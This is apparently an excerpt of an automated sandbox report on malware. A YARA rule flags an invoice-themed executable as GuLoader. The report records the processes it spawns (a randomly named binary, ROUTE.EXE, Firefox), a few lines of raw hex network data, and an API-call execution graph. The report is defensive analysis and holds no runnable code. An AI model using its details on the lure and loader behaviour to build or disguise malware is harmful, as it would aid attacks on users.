                                                                                                                                                                                                                        2024-10-23 16:52:52 UTC1255INData Raw: 36 60 57 66 7e 43 38 13 65 55 c6 f5 98 82 2d 7d f7 85 fd 55 a0 fb a4 9a 4c bc c6 0d 6b c0 d2 8c c3 ed 6e 1a 7a 5f 99 cc 3f 32 b4 1f b5 f2 81 41 e9 ec 62 9a 62 f8 a2 96 25 f8 21 90 49 de 23 a1 85 e1 ca 4b 99 db d4 cc a3 bd 23 93 5e 52 01 ec 39 af de 32 e9 81 56 ed d9 35 f5 2e 63 d5 4d 9d 6e 61 c4 c3 f5 70 98 97 6c bf 98 d5 11 69 77 76 e4 3c 72 0d 29 7c 16 f3 df e8 08 37 6b 12 2e b0 b6 45 60 61 dd f5 be 90 4e de 0e 64 72 d9 dd 6a 25 27 5b 20 4a 58 e1 1b 7e 5b e9 c8 06 f3 2e 69 06 38 68 33 c0 ba db 20 6d d7 d4 d1 5d a6 8e 55 04 96 42 ff 35 34 71 9d e5 63 d3 4d 02 50 b3 30 cb 09 23 98 87 9d 14 74 9f 39 f6 17 7a e4 25 e2 f5 5c e6 e0 57 27 60 2d 5c 60 bc 03 fc 79 26 c6 4b 2e dd 52 9a a6 b8 0e 6c 55 fa 84 69 c2 5e 6b 38 85 38 59 3c 85 00 61 98 e0 ba d4 28 d9 37
                                                                                                                                                                                                                        Data Ascii: 6`Wf~C8eU-}ULknz_?2Abb%!I#K#^R92V5.cMnapliwv<r)|7k.E`aNdrj%'[ JX~[.i8h3 m]UB54qcMP0#t9z%\W'`-\`y&K.RlUi^k88Y<a(7
                                                                                                                                                                                                                        2024-10-23 16:52:52 UTC1255INData Raw: 9b e9 f1 1d 54 24 dd 06 f4 70 1f 92 05 36 95 c7 6a c6 d9 8d d5 e8 87 a8 ad 91 2c d0 00 79 92 9a 95 05 f1 16 01 c5 95 c0 48 3f fe c1 38 2e 55 4f 74 13 87 2f 07 a3 c6 18 d3 3e 9b d0 ca 5e e5 0d 5f 0b f6 4a c5 05 f1 55 e4 3a 23 69 c4 42 0a ac be a6 94 ac 01 6f dc 88 71 33 da f0 76 a9 ff 7e 37 03 1d 60 d8 af 00 13 7a 48 7c 6e e8 6f 2e ab ae 89 ed 5e cd 6a 92 0e de a6 92 93 0f 81 b3 9c b1 c2 1b 2b ec 62 45 f1 c0 7d eb a5 86 7f 49 15 ff 8c c3 ba b9 7d ab 18 da c0 54 4d 32 14 49 22 d3 dc 0d 9d ea 67 b9 9d c8 1a b9 5e 91 55 0c 5e eb 4b 06 d0 e1 21 24 0d e9 a7 a2 79 8c dc 3e 78 8c 27 15 a5 ef d9 53 b9 a5 fd 53 d3 89 df ef 3e c1 99 63 38 bf a8 bf 35 45 95 92 66 79 31 12 d0 c1 e5 3f 2a 8c 8a 45 9e 40 a2 20 4c aa 66 b7 0a 5c d5 18 65 54 67 fe ba 9b d4 72 88 14 56 35
                                                                                                                                                                                                                        Data Ascii: T$p6j,yH?8.UOt/>^_JU:#iBoq3v~7`zH|no.^j+bE}I}TM2I"g^U^K!$y>x'SS>c85Efy1?*E@ Lf\eTgrV5
                                                                                                                                                                                                                        2024-10-23 16:52:52 UTC1255INData Raw: 4d 1e 1d 82 5c 90 31 0c b9 05 7d 06 56 67 58 2a de 7b 17 1a 14 47 29 12 72 8d b1 00 53 a3 6a 89 0e 6c c8 09 a0 9e bc 2e 47 09 eb 3d cd 83 cc 19 a3 2e 06 38 90 9e f6 ba 73 f7 2b c7 86 f3 28 26 aa 34 35 8e 39 89 e2 64 64 f3 e7 25 db ae c0 68 58 95 5e 98 d7 4d 28 30 fb 5c 5f 07 9c ff 93 22 7e b6 f0 1a 54 83 c5 8d fa c7 33 98 6b 3f c7 cf 2c 64 35 26 66 a1 ca 79 4b 66 57 c0 dd 59 dd 87 1e b1 33 63 7c 34 61 39 e4 6c de fe bb 51 63 db 01 36 a5 45 81 e0 91 d9 23 6c 6e 8e 5b ad ca 0a 68 27 92 04 db 75 50 c8 83 62 ef b5 53 ef 3d c6 6c 7b 0a a7 c6 28 a9 ee 71 37 ae fd 2e f1 82 52 67 87 ef 0d 7d 9a 8c f1 9c 65 b4 a8 84 eb 30 e3 9a db 85 aa 1d 69 31 6a 03 9a 78 4b dc 73 9a bd 1d 65 bf 83 89 6c e9 39 17 c5 e2 7b c3 ae 07 68 36 e0 ac fa ae ac 64 9f ac b1 b1 07 53 2a 09
                                                                                                                                                                                                                        Data Ascii: M\1}VgX*{G)rSjl.G=.8s+(&459dd%hX^M(0\_"~T3k?,d5&fyKfWY3c|4a9lQc6E#ln[h'uPbS=l{(q7.Rg}e0i1jxKsel9{h6dS*


                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                        Start time:12:51:26
                                                                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\FACTURA A-7507_H1758.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:741'961 bytes
                                                                                                                                                                                                                        MD5 hash:1595B77A26B3343C46FC12FC8CCDCE82
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.26333481443.00000000047A5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                        Start time:12:52:36
                                                                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\FACTURA A-7507_H1758.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:741'961 bytes
                                                                                                                                                                                                                        MD5 hash:1595B77A26B3343C46FC12FC8CCDCE82
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                        Start time:12:53:06
                                                                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                                                                        Path:C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe"
                                                                                                                                                                                                                        Imagebase:0x770000
                                                                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                        Start time:12:53:08
                                                                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\ROUTE.EXE
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\ROUTE.EXE"
                                                                                                                                                                                                                        Imagebase:0x9b0000
                                                                                                                                                                                                                        File size:19'456 bytes
                                                                                                                                                                                                                        MD5 hash:C563191ED28A926BCFDB1071374575F1
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                        Start time:12:53:20
                                                                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                                                                        Path:C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe"
                                                                                                                                                                                                                        Imagebase:0x770000
                                                                                                                                                                                                                        File size:140'800 bytes
                                                                                                                                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                        Start time:12:53:33
                                                                                                                                                                                                                        Start date:23/10/2024
                                                                                                                                                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff716af0000
                                                                                                                                                                                                                        File size:597'432 bytes
                                                                                                                                                                                                                        MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:19.8%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:13.5%
                                                                                                                                                                                                                          Signature Coverage:22.1%
                                                                                                                                                                                                                          Total number of Nodes:1567
                                                                                                                                                                                                                          Total number of Limit Nodes:50
                                                                                                                                                                                                                          execution_graph 5137 10001000 5140 1000101b 5137->5140 5147 10001516 5140->5147 5142 10001020 5143 10001024 5142->5143 5144 10001027 GlobalAlloc 5142->5144 5145 1000153d 3 API calls 5143->5145 5144->5143 5146 10001019 5145->5146 5149 1000151c 5147->5149 5148 10001522 5148->5142 5149->5148 5150 1000152e GlobalFree 5149->5150 5150->5142 5151 402840 5152 402bbf 18 API calls 5151->5152 5154 40284e 5152->5154 5153 402864 5156 405d2e 2 API calls 5153->5156 5154->5153 5155 402bbf 18 API calls 5154->5155 5155->5153 5157 40286a 5156->5157 5179 405d53 GetFileAttributesW CreateFileW 5157->5179 5159 402877 5160 402883 GlobalAlloc 5159->5160 5161 40291a 5159->5161 5164 402911 CloseHandle 5160->5164 5165 40289c 5160->5165 5162 402922 DeleteFileW 5161->5162 5163 402935 5161->5163 5162->5163 5164->5161 5180 40336e SetFilePointer 5165->5180 5167 4028a2 5168 403358 ReadFile 5167->5168 5169 4028ab GlobalAlloc 5168->5169 5170 4028bb 5169->5170 5171 4028ef 5169->5171 5172 4030e7 45 API calls 5170->5172 5173 405e05 WriteFile 5171->5173 5178 4028c8 5172->5178 5174 4028fb GlobalFree 5173->5174 5175 4030e7 45 API calls 5174->5175 5176 40290e 5175->5176 5176->5164 5177 4028e6 GlobalFree 5177->5171 5178->5177 5179->5159 5180->5167 5181 401cc0 5182 402ba2 18 API calls 5181->5182 5183 401cc7 5182->5183 5184 402ba2 18 API calls 5183->5184 5185 401ccf GetDlgItem 5184->5185 5186 402531 5185->5186 5187 4029c0 5188 402ba2 18 API calls 5187->5188 5189 4029c6 5188->5189 5190 4029f9 5189->5190 5192 40281e 5189->5192 5193 4029d4 5189->5193 5191 4061a0 18 API calls 5190->5191 5190->5192 5191->5192 5193->5192 5195 4060c5 wsprintfW 5193->5195 5195->5192 4026 401fc3 4027 401fd5 4026->4027 4028 402087 4026->4028 4049 402bbf 4027->4049 4031 401423 25 API calls 4028->4031 4036 4021e1 4031->4036 4032 402bbf 18 API calls 4033 401fe5 4032->4033 4034 401ffb LoadLibraryExW 4033->4034 4035 401fed GetModuleHandleW 4033->4035 4034->4028 4037 40200c 4034->4037 4035->4034 4035->4037 4055 4065c7 WideCharToMultiByte 4037->4055 4040 402056 4103 4052dd 4040->4103 4041 40201d 4043 402025 4041->4043 4044 40203c 4041->4044 4100 401423 4043->4100 4058 10001759 4044->4058 4046 40202d 4046->4036 4047 402079 FreeLibrary 4046->4047 4047->4036 4050 402bcb 4049->4050 4114 4061a0 4050->4114 4053 401fdc 4053->4032 4056 4065f1 GetProcAddress 4055->4056 4057 402017 4055->4057 4056->4057 4057->4040 4057->4041 4059 10001789 4058->4059 4153 10001b18 4059->4153 4061 10001790 4062 100018a6 4061->4062 4063 100017a1 4061->4063 4064 100017a8 4061->4064 4062->4046 4202 10002286 4063->4202 4185 100022d0 4064->4185 4069 1000180c 4074 10001812 4069->4074 4075 1000184e 4069->4075 4070 100017ee 4215 100024a9 4070->4215 4071 100017d7 4084 100017cd 4071->4084 4212 10002b5f 4071->4212 4072 100017be 4073 100017c4 4072->4073 4078 100017cf 4072->4078 4073->4084 4196 100028a4 4073->4196 4080 100015b4 3 API calls 4074->4080 4082 100024a9 10 API calls 4075->4082 4077 100017f4 4226 100015b4 4077->4226 4206 10002645 4078->4206 4086 10001828 4080->4086 4092 10001840 4082->4092 4084->4069 4084->4070 4089 100024a9 10 API calls 4086->4089 4088 100017d5 4088->4084 4089->4092 4091 10001895 4091->4062 4095 1000189f GlobalFree 4091->4095 4092->4091 4237 1000246c 4092->4237 4095->4062 4097 10001881 4097->4091 4241 1000153d wsprintfW 4097->4241 4098 1000187a FreeLibrary 4098->4097 4101 4052dd 25 API calls 4100->4101 4102 401431 4101->4102 4102->4046 4104 4052f8 4103->4104 4113 40539a 4103->4113 4105 405314 lstrlenW 4104->4105 4106 4061a0 18 API calls 4104->4106 4107 405322 lstrlenW 4105->4107 4108 40533d 4105->4108 4106->4105 4111 405334 lstrcatW 4107->4111 4107->4113 4109 405350 4108->4109 4110 405343 SetWindowTextW 4108->4110 4112 405356 SendMessageW SendMessageW SendMessageW 4109->4112 4109->4113 4110->4109 4111->4108 4112->4113 4113->4046 4116 4061ad 4114->4116 4115 4063f8 4117 402bec 4115->4117 4148 40617e lstrcpynW 4115->4148 4116->4115 4119 406260 GetVersion 4116->4119 4120 4063c6 lstrlenW 4116->4120 4121 4061a0 10 API calls 4116->4121 4124 4062db GetSystemDirectoryW 4116->4124 4126 4062ee GetWindowsDirectoryW 4116->4126 4127 406412 5 API calls 4116->4127 4128 4061a0 10 API calls 4116->4128 4129 406367 lstrcatW 4116->4129 4130 406322 SHGetSpecialFolderLocation 4116->4130 4141 40604b RegOpenKeyExW 4116->4141 4146 4060c5 wsprintfW 4116->4146 4147 40617e lstrcpynW 4116->4147 4117->4053 4132 406412 4117->4132 4119->4116 4120->4116 4121->4120 4124->4116 4126->4116 4127->4116 4128->4116 4129->4116 4130->4116 4131 40633a SHGetPathFromIDListW CoTaskMemFree 4130->4131 4131->4116 4139 40641f 4132->4139 4133 40649a CharPrevW 4135 406495 4133->4135 4134 406488 CharNextW 4134->4135 4134->4139 4135->4133 4136 4064bb 4135->4136 4136->4053 4138 406474 CharNextW 4138->4139 4139->4134 4139->4135 4139->4138 4140 406483 CharNextW 4139->4140 4149 405b5f 4139->4149 4140->4134 4142 4060bf 4141->4142 4143 40607f RegQueryValueExW 4141->4143 4142->4116 4144 4060a0 RegCloseKey 4143->4144 4144->4142 4146->4116 4147->4116 4148->4117 4150 405b65 4149->4150 4151 405b7b 4150->4151 4152 405b6c CharNextW 4150->4152 4151->4139 4152->4150 4244 1000121b GlobalAlloc 4153->4244 4155 10001b3c 4245 1000121b GlobalAlloc 4155->4245 4157 10001d7a GlobalFree GlobalFree GlobalFree 4159 10001d97 4157->4159 4171 10001de1 4157->4171 4158 10001b47 4158->4157 4161 10001c1d GlobalAlloc 4158->4161 4163 10001c68 lstrcpyW 4158->4163 4164 10002048 4158->4164 4165 10001c86 GlobalFree 4158->4165 4170 10001c72 lstrcpyW 4158->4170 4158->4171 4179 10001cc4 4158->4179 4180 10001f37 GlobalFree 4158->4180 4183 1000122c 2 API calls 4158->4183 4251 1000121b GlobalAlloc 4158->4251 4160 100020ee 4159->4160 4169 10001dac 4159->4169 4159->4171 4162 10002110 GetModuleHandleW 4160->4162 4160->4171 4161->4158 4166 10002121 LoadLibraryW 4162->4166 4167 10002136 4162->4167 4163->4170 4164->4171 4178 10002090 lstrcpyW 4164->4178 4165->4158 4166->4167 4166->4171 4252 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4167->4252 4169->4171 4248 1000122c 4169->4248 4170->4158 4171->4061 4172 10002195 lstrlenW 4253 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4172->4253 4173 10002188 4173->4171 4173->4172 4177 100021af 4177->4171 4178->4171 4179->4158 4246 1000158f GlobalSize GlobalAlloc 4179->4246 4180->4158 4181 10002148 4181->4173 4184 10002172 GetProcAddress 4181->4184 4183->4158 4184->4173 4186 100022e8 4185->4186 4187 1000122c GlobalAlloc lstrcpynW 4186->4187 4189 10002415 GlobalFree 4186->4189 4191 100023d3 lstrlenW 4186->4191 4192 100023ba GlobalAlloc CLSIDFromString 4186->4192 4193 1000238f GlobalAlloc WideCharToMultiByte 4186->4193 4255 100012ba 4186->4255 4187->4186 4189->4186 4190 100017ae 4189->4190 4190->4071 4190->4072 4190->4084 4191->4189 4195 100023de 4191->4195 4192->4189 4193->4189 4195->4189 4259 100025d9 4195->4259 4198 100028b6 4196->4198 4197 1000295b EnumWindows 4199 10002979 4197->4199 4198->4197 4200 10002a75 4199->4200 4201 10002a6a GetLastError 4199->4201 4200->4084 4201->4200 4203 10002296 4202->4203 4204 100017a7 4202->4204 4203->4204 4205 100022a8 GlobalAlloc 4203->4205 4204->4064 4205->4203 4210 10002661 4206->4210 4207 100026b2 GlobalAlloc 4211 100026d4 4207->4211 4208 100026c5 4209 100026ca GlobalSize 4208->4209 4208->4211 4209->4211 4210->4207 4210->4208 4211->4088 4213 10002b6a 4212->4213 4214 10002baa GlobalFree 4213->4214 4262 1000121b GlobalAlloc 4215->4262 4217 10002530 StringFromGUID2 4222 100024b3 4217->4222 4218 10002541 lstrcpynW 4218->4222 4219 1000250b MultiByteToWideChar 4219->4222 4220 10002571 GlobalFree 4220->4222 4221 10002554 wsprintfW 4221->4222 4222->4217 4222->4218 4222->4219 4222->4220 4222->4221 4223 100025ac GlobalFree 4222->4223 4224 10001272 2 API calls 4222->4224 4263 100012e1 4222->4263 4223->4077 4224->4222 4267 1000121b GlobalAlloc 4226->4267 4228 100015ba 4229 100015c7 lstrcpyW 4228->4229 4231 100015e1 4228->4231 4232 100015fb 4229->4232 4231->4232 4233 100015e6 wsprintfW 4231->4233 4234 10001272 4232->4234 4233->4232 4235 100012b5 GlobalFree 4234->4235 4236 1000127b GlobalAlloc lstrcpynW 4234->4236 4235->4092 4236->4235 4238 10001861 4237->4238 4239 1000247a 4237->4239 4238->4097 4238->4098 4239->4238 4240 10002496 GlobalFree 4239->4240 4240->4239 4242 10001272 2 API calls 4241->4242 4243 1000155e 4242->4243 4243->4091 4244->4155 4245->4158 4247 100015ad 4246->4247 4247->4179 4254 1000121b GlobalAlloc 4248->4254 4250 1000123b lstrcpynW 4250->4171 4251->4158 4252->4181 4253->4177 4254->4250 4256 100012c1 4255->4256 4257 1000122c 2 API calls 4256->4257 4258 100012df 4257->4258 4258->4186 4260 100025e7 VirtualAlloc 4259->4260 4261 1000263d 4259->4261 4260->4261 4261->4195 4262->4222 4264 100012ea 4263->4264 4265 1000130c 4263->4265 4264->4265 4266 100012f0 lstrcpyW 4264->4266 4265->4222 4266->4265 4267->4228 5196 4016c4 5197 402bbf 18 API calls 5196->5197 5198 4016ca GetFullPathNameW 5197->5198 5199 4016e4 5198->5199 5205 401706 5198->5205 5202 4064c1 2 API calls 5199->5202 5199->5205 5200 40171b GetShortPathNameW 5201 402a4c 5200->5201 5203 4016f6 5202->5203 5203->5205 5206 40617e lstrcpynW 5203->5206 5205->5200 5205->5201 5206->5205 5207 406846 5209 4066ca 5207->5209 5208 407035 5209->5208 5209->5209 5210 406754 GlobalAlloc 5209->5210 5211 40674b GlobalFree 5209->5211 5212 4067c2 GlobalFree 5209->5212 5213 4067cb GlobalAlloc 5209->5213 5210->5208 5210->5209 5211->5210 5212->5213 5213->5208 5213->5209 5217 40194e 5218 402bbf 18 API calls 5217->5218 5219 401955 lstrlenW 5218->5219 5220 402531 5219->5220 5221 4027ce 5222 4027d6 5221->5222 5223 4027da FindNextFileW 5222->5223 5225 4027ec 5222->5225 5224 402833 5223->5224 5223->5225 5227 40617e lstrcpynW 5224->5227 5227->5225 4568 405251 4569 405261 4568->4569 4570 405275 4568->4570 4573 405267 4569->4573 4581 4052be 4569->4581 4571 40529d 4570->4571 4572 40527d IsWindowVisible 4570->4572 4576 4052c3 CallWindowProcW 4571->4576 4587 404c27 4571->4587 4575 40528a 4572->4575 4572->4581 4574 40428e SendMessageW 4573->4574 4577 405271 4574->4577 4582 404ba7 SendMessageW 4575->4582 4576->4577 4581->4576 4583 404c06 SendMessageW 4582->4583 4584 404bca GetMessagePos ScreenToClient SendMessageW 4582->4584 4586 404bfe 4583->4586 4585 404c03 4584->4585 4584->4586 4585->4583 4586->4571 4596 40617e lstrcpynW 4587->4596 4589 404c3a 4597 4060c5 wsprintfW 4589->4597 4591 404c44 4592 40140b 2 API calls 4591->4592 4593 404c4d 4592->4593 4598 40617e lstrcpynW 4593->4598 4595 404c54 4595->4581 4596->4589 4597->4591 4598->4595 4599 401754 4600 402bbf 18 API calls 4599->4600 4601 40175b 4600->4601 4605 405d82 4601->4605 4603 401762 4604 405d82 2 API calls 4603->4604 4604->4603 4606 405d8f GetTickCount GetTempFileNameW 4605->4606 4607 405dc9 4606->4607 4608 405dc5 4606->4608 4607->4603 4608->4606 4608->4607 5235 404356 lstrcpynW lstrlenW 5236 401d56 GetDC GetDeviceCaps 5237 402ba2 18 API calls 5236->5237 5238 401d74 MulDiv ReleaseDC 5237->5238 5239 402ba2 18 API calls 5238->5239 5240 401d93 5239->5240 5241 4061a0 18 API calls 5240->5241 5242 401dcc CreateFontIndirectW 5241->5242 5243 402531 5242->5243 4992 4014d7 4993 402ba2 18 API calls 4992->4993 4994 4014dd Sleep 4993->4994 4996 402a4c 4994->4996 5244 401a57 5245 402ba2 18 API calls 5244->5245 5246 401a5d 5245->5246 5247 402ba2 18 API calls 5246->5247 5248 401a05 5247->5248 4997 404c59 GetDlgItem GetDlgItem 4998 404cab 7 API calls 4997->4998 5044 404ec4 4997->5044 4999 404d41 SendMessageW 4998->4999 5000 404d4e DeleteObject 4998->5000 4999->5000 5001 404d57 5000->5001 5002 404d66 5001->5002 5003 404d8e 5001->5003 5004 4061a0 18 API calls 5002->5004 5006 404242 19 API calls 5003->5006 5008 404d70 SendMessageW SendMessageW 5004->5008 5005 404f89 5015 404f9a SendMessageW 5005->5015 5021 404fa8 5005->5021 5012 404da2 5006->5012 5007 405054 5009 405066 5007->5009 5010 40505e SendMessageW 5007->5010 5008->5001 5022 405078 ImageList_Destroy 5009->5022 5023 40507f 5009->5023 5028 40508f 5009->5028 5010->5009 5011 404f24 5016 404ba7 5 API calls 5011->5016 5017 404242 19 API calls 5012->5017 5013 40523c 5014 4042a9 8 API calls 5013->5014 5020 40524a 5014->5020 5015->5021 5034 404f35 5016->5034 5031 404db0 5017->5031 5018 405001 SendMessageW 5018->5013 5019 405016 SendMessageW 5018->5019 5025 405029 5019->5025 5021->5007 5021->5013 5021->5018 5022->5023 5026 405088 GlobalFree 5023->5026 5023->5028 5024 4051fe 5024->5013 5029 405210 ShowWindow GetDlgItem ShowWindow 5024->5029 5036 40503a SendMessageW 5025->5036 5026->5028 5027 404e85 GetWindowLongW SetWindowLongW 5030 404e9e 5027->5030 5028->5024 5042 404c27 4 API calls 5028->5042 5048 4050ca 5028->5048 5029->5013 5032 404ea4 ShowWindow 5030->5032 5033 404ebc 5030->5033 5031->5027 5035 404e00 SendMessageW 5031->5035 5037 404e7f 5031->5037 5040 404e3c SendMessageW 5031->5040 5041 404e4d SendMessageW 5031->5041 5053 404277 SendMessageW 5032->5053 5054 404277 SendMessageW 5033->5054 5034->5005 5035->5031 5036->5007 5037->5027 5037->5030 5040->5031 5041->5031 5042->5048 5043 404eb7 5043->5013 5044->5005 5044->5011 5044->5021 5045 4051d4 InvalidateRect 5045->5024 5046 4051ea 5045->5046 5055 404b62 5046->5055 5047 4050f8 SendMessageW 5049 40510e 5047->5049 5048->5047 5048->5049 5049->5045 5051 40516f 5049->5051 5052 405182 SendMessageW SendMessageW 5049->5052 5051->5052 5052->5049 5053->5043 5054->5044 5058 404a99 5055->5058 5057 404b77 5057->5024 5059 404ab2 5058->5059 5060 4061a0 18 API calls 5059->5060 5061 404b16 5060->5061 5062 4061a0 18 API calls 5061->5062 5063 404b21 5062->5063 5064 4061a0 18 API calls 5063->5064 5065 404b37 lstrlenW wsprintfW SetDlgItemTextW 5064->5065 5065->5057 5249 40155b 5250 4029f2 5249->5250 5253 4060c5 wsprintfW 5250->5253 5252 4029f7 5253->5252 5119 401ddc 5120 402ba2 18 API calls 5119->5120 5121 401de2 5120->5121 5122 402ba2 18 API calls 5121->5122 5123 401deb 5122->5123 5124 401df2 ShowWindow 5123->5124 5125 401dfd EnableWindow 5123->5125 5126 402a4c 5124->5126 5125->5126 5254 4046dd 5255 404709 5254->5255 5256 40471a 5254->5256 5315 4058a7 GetDlgItemTextW 5255->5315 5258 404726 GetDlgItem 5256->5258 5264 404785 5256->5264 5261 40473a 5258->5261 5259 404869 5265 404a18 5259->5265 5317 4058a7 GetDlgItemTextW 5259->5317 5260 404714 5262 406412 5 API calls 5260->5262 5263 40474e SetWindowTextW 5261->5263 5267 405bdd 4 API calls 5261->5267 5262->5256 5268 404242 19 API calls 5263->5268 5264->5259 5264->5265 5269 4061a0 18 API calls 5264->5269 5271 4042a9 8 API calls 5265->5271 5273 404744 5267->5273 5274 40476a 5268->5274 5275 4047f9 SHBrowseForFolderW 5269->5275 5270 404899 5276 405c3a 18 API calls 5270->5276 5272 404a2c 5271->5272 5273->5263 5280 405b32 3 API calls 5273->5280 5277 404242 19 API calls 5274->5277 5275->5259 5278 404811 CoTaskMemFree 5275->5278 5279 40489f 5276->5279 5281 404778 5277->5281 5282 405b32 3 API calls 5278->5282 5318 40617e lstrcpynW 5279->5318 5280->5263 5316 404277 SendMessageW 5281->5316 5284 40481e 5282->5284 5287 404855 SetDlgItemTextW 5284->5287 5291 4061a0 18 API calls 5284->5291 5286 40477e 5289 406558 5 API calls 5286->5289 5287->5259 5288 4048b6 5290 406558 5 API calls 5288->5290 5289->5264 5297 4048bd 5290->5297 5292 40483d lstrcmpiW 5291->5292 5292->5287 5295 40484e lstrcatW 5292->5295 5293 4048fe 5319 40617e lstrcpynW 5293->5319 5295->5287 5296 404905 5298 405bdd 4 API calls 5296->5298 5297->5293 5301 405b7e 2 API calls 5297->5301 5303 404956 5297->5303 5299 40490b GetDiskFreeSpaceW 5298->5299 5302 40492f MulDiv 5299->5302 5299->5303 5301->5297 5302->5303 5304 4049c7 5303->5304 5306 404b62 21 API calls 5303->5306 5305 4049ea 5304->5305 5307 40140b 2 API calls 5304->5307 5320 404264 EnableWindow 5305->5320 5308 4049b4 5306->5308 5307->5305 5310 4049c9 SetDlgItemTextW 5308->5310 5311 4049b9 5308->5311 5310->5304 5313 404a99 21 API calls 5311->5313 5312 404a06 5312->5265 5321 404672 5312->5321 5313->5304 5315->5260 5316->5286 5317->5270 5318->5288 5319->5296 5320->5312 5322 404680 5321->5322 5323 404685 SendMessageW 5321->5323 5322->5323 5323->5265 5324 4022df 5325 402bbf 18 API calls 5324->5325 5326 4022ee 5325->5326 5327 402bbf 18 API calls 5326->5327 5328 4022f7 5327->5328 5329 402bbf 18 API calls 5328->5329 5330 402301 GetPrivateProfileStringW 5329->5330 5331 4043df 5332 4043f7 5331->5332 5338 404511 5331->5338 5339 404242 19 API calls 5332->5339 5333 40457b 5334 404585 GetDlgItem 5333->5334 5335 40464d 5333->5335 5336 40460e 5334->5336 5337 40459f 5334->5337 5342 4042a9 8 API calls 5335->5342 5336->5335 5344 404620 5336->5344 5337->5336 5343 4045c5 6 API calls 5337->5343 5338->5333 5338->5335 5340 40454c GetDlgItem SendMessageW 5338->5340 5341 40445e 5339->5341 5362 404264 EnableWindow 5340->5362 5346 404242 19 API calls 5341->5346 5352 404648 5342->5352 5343->5336 5348 404636 5344->5348 5349 404626 SendMessageW 5344->5349 5347 40446b CheckDlgButton 5346->5347 5360 404264 EnableWindow 5347->5360 5348->5352 5353 40463c SendMessageW 5348->5353 5349->5348 5350 404576 5354 404672 SendMessageW 5350->5354 5353->5352 5354->5333 5355 404489 GetDlgItem 5361 404277 SendMessageW 5355->5361 5357 40449f SendMessageW 5358 4044c5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 